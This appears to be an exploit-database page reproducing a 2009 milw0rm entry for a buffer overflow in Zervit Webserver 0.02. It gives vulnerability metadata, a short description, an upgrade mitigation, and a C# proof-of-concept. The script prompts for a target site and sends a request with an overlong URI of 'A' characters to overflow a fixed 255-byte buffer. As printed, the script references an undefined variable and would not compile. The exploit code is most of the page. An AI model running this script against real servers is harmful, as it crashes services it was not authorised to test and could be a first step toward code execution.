header-logo
Suggest Exploit
vendor:
Zervit Webserver
by:
e.wiZz!
9,3
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: Zervit Webserver
Affected Version From: 0.02
Affected Version To: 0.02
Patch Exists: Yes
Related CWE: N/A
CPE: a:mereo:zervit_webserver
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows
2009

Zervit Webserver 0.02 Buffer Overflow

When requested uri isn't found, it goes to char tmp[255], and later it is used to output, you need 256 chars to overflow (check source http.c). An attacker can send a maliciously crafted request with 256 characters to the vulnerable server, which will cause a buffer overflow and allow the attacker to execute arbitrary code on the server.

Mitigation:

Upgrade to the latest version of Zervit Webserver.
Source

Exploit-DB raw data:

####################  Zervit Webserver 0.02  Buffer Overflow   ############################


############### By:      e.wiZz!

###############Site:   www.balcansecurity.com


############### Found with ServMeNot (world's sexiest fuzzer :P )



In the wild...

########################################################################################

######Vend0r site: http://www.ohloh.net/projects/mereo


/* When requested uri isn't found,it goes to char tmp[255],
and later it is used to output,you need 256 chars to overflow (check source "http.c") */

using System;
using System.IO;
using System.Net;
using System.Text;

class whatsoever
{
    static void Main()
    {
        // StringBuilder sb = new StringBuilder();

        //byte[] buf = new byte[8192];

        Console.WriteLine("Enter site: (http://localhost)");
        string sajt = Console.ReadLine();
        string uribad = "/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA";
        HttpWebRequest request = (HttpWebRequest)
           
            WebRequest.Create(sajt+uribad);

        HttpWebResponse response = (HttpWebResponse)
            request.GetResponse();
        // you shouldn't see response
        Console.WriteLine(sb.ToString());
    }
}

// milw0rm.com [2009-04-15]

Navigation

Suggest Exploit

Services By CQR